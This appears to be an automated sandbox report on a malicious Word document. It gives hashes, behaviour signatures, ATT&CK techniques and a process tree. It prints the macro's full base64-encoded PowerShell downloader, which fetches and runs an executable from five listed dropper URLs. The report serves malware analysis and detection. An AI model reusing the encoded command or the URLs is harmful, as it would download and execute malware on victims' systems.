Analysis

  • max time kernel
    144s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-05-2024 20:20

General

  • Target

    1e35156777f498663f05a328abcfba80_JaffaCakes118.doc

  • Size

    123KB

  • MD5

    1e35156777f498663f05a328abcfba80

  • SHA1

    392937c8a098fcdca9d9cae58a5a05ec657f485f

  • SHA256

    9de70af07f1659f32c9e7aeb00a61ba1b1ca8e7985f1d5a3cc4197f67e8675b6

  • SHA512

    d259c69c274a7be8d768b426713336330b62bf94b836abcf38d4a5eeea24283242610b36ae7e488234482c73f2a76e6b98ea04603b2a13c68ef12c1b8acba0ef

  • SSDEEP

    3072:S77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q/tr0mTOl:S77HUUUUUUUUUUUUUUUUUUUT52V8r0m6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://atlanticsg.com/wp-includes/fsfrz22_mkp29qlby-69478/

exe.dropper

http://eastpennlandscape.com/css/qhJUtdBFvM/

exe.dropper

http://mcs-interiors.co.uk/cgi-bin/MUbadZUIXD/

exe.dropper

http://laderajabugo.navicu.com/wp-admin/6ohv5j_6m40d-4652183/

exe.dropper

http://banphongresort.com/wp-includes/8hxbg02o_wkpvf-27459009/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e35156777f498663f05a328abcfba80_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3980
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:5076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy bypass -noprofile -e JABRAG4AZgB6AGoASAB3AD0AJwBGAGkAcQBMAGwAdwAnADsAJABOAGwATQBJAGQAawAgAD0AIAAnADcAMAA2ACcAOwAkAHcAcwBOAGQAMAA1AD0AJwBYAGgAUgBpAGkATwBQAGwAJwA7ACQAdQBVAEkARQBPAGYAMgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGwATQBJAGQAawArACcALgBlAHgAZQAnADsAJABaAEUAdwBCAFIAUwBPAD0AJwBuAEYAcAB6AGkAdwAnADsAJABUAHAAUwA0ADYAcwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdABgAC4AdwBFAGIAQwBgAGwASQBFAE4AdAA7ACQARAB3AGIAOQB6AHMAVwA9ACcAaAB0AHQAcABzADoALwAvAGEAdABsAGEAbgB0AGkAYwBzAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGYAcwBmAHIAegAyADIAXwBtAGsAcAAyADkAcQBsAGIAeQAtADYAOQA0ADcAOAAvAEAAaAB0AHQAcAA6AC8ALwBlAGEAcwB0AHAAZQBuAG4AbABhAG4AZABzAGMAYQBwAGUALgBjAG8AbQAvAGMAcwBzAC8AcQBoAEoAVQB0AGQAQgBGAHYATQAvAEAAaAB0AHQAcAA6AC8ALwBtAGMAcwAtAGkAbgB0AGUAcgBpAG8AcgBzAC4AYwBvAC4AdQBrAC8AYwBnAGkALQBiAGkAbgAvAE0AVQBiAGEAZABaAFUASQBYAEQALwBAAGgAdAB0AHAAOgAvAC8AbABhAGQAZQByAGEAagBhAGIAdQBnAG8ALgBuAGEAdgBpAGMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBvAGgAdgA1AGoAXwA2AG0ANAAwAGQALQA0ADYANQAyADEAOAAzAC8AQABoAHQAdABwADoALwAvAGIAYQBuAHAAaABvAG4AZwByAGUAcwBvAHIAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOABoAHgAYgBnADAAMgBvAF8AdwBrAHAAdgBmAC0AMgA3ADQANQA5ADAAMAA5AC8AJwAuAHMAUABsAEkAdAAoACcAQAAnACkAOwAkAEIAUwAyAHAAbQA1AHQAPQAnAGgAegBuAFUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAbQA4AHoAXwBHAFIAIABpAG4AIAAkAEQAdwBiADkAegBzAFcAKQB7AHQAcgB5AHsAJABUAHAAUwA0ADYAcwAuAEQAbwBXAE4ATABPAEEAZABmAEkATABFACgAJABHAGkAbQA4AHoAXwBHAFIALAAgACQAdQBVAEkARQBPAGYAMgB6ACkAOwAkAEwAUQBYADYAYQA2AD0AJwBoAEoAcwB6AHMAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHUAVQBJAEUATwBmADIAegApAC4ATABFAE4ARwB0AEgAIAAtAGcAZQAgADMAMwA2ADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJAB1AFUASQBFAE8AZgAyAHoAKQA7ACQATABTAEkAMwA0AEsARgA9ACcAaABjAEgANwBWAGYAJwA7AGIAcgBlAGEAawA7ACQATwBoADUAdABtAFkAbQA9ACcAbgBBADQAaQAyAEcAYQB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAWQBVAEYAUwBqAD0AJwBvAEcAcwB3AE4AdQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1404

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3B7CC5AD.wmf
      Filesize

      444B

      MD5

      29b9e33258fa8710be1a7ea3fdf48bf1

      SHA1

      ec2e53f2450865491bcd99f0798bb533174a2db3

      SHA256

      5597b507e2e2cea8a34768bd72cfeae1be0b3ff6bb38a083694c0aec2d5a4a6b

      SHA512

      bc83c04fdbad78b7c21432d51ae80c3992fbc3e425e05cde1a341df14419e29d155de675828faf0969775f904c64cde360a1c94f22f016796cc8548fe4d279a0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F797F07.wmf
      Filesize

      444B

      MD5

      8202c9465c425ee33b9dc245b662f078

      SHA1

      b4b11302c6ea8873a4aa98e022f3f44c7f5db247

      SHA256

      1470b60e45ba67db8c865b1e17bf4506f74b34b894a13658a73d9c023257d09b

      SHA512

      aa0a590ef0a933f23290c3c4339943a576c64425ea9f4d1c0966e6768d8dd6ecd1586ffb77879ac46e786753256053464b3becea581d46a3048d98c9b0297d67

    • C:\Users\Admin\AppData\Local\Temp\TCD9911.tmp\iso690.xsl
      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wewy3kts.bs5.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1404-55-0x00000191389A0000-0x00000191389C2000-memory.dmp
      Filesize

      136KB

    • memory/3980-8-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-17-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-7-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-0-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-11-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-12-0x00007FFAC5110000-0x00007FFAC5120000-memory.dmp
      Filesize

      64KB

    • memory/3980-10-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-9-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-13-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-14-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-16-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-15-0x00007FFAC5110000-0x00007FFAC5120000-memory.dmp
      Filesize

      64KB

    • memory/3980-20-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-19-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-18-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-1-0x00007FFB07A8D000-0x00007FFB07A8E000-memory.dmp
      Filesize

      4KB

    • memory/3980-2-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-3-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-4-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-5-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-6-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-527-0x00007FFB07A8D000-0x00007FFB07A8E000-memory.dmp
      Filesize

      4KB

    • memory/3980-553-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-554-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB

    • memory/3980-583-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-584-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-586-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-585-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmp
      Filesize

      64KB

    • memory/3980-587-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmp
      Filesize

      2.0MB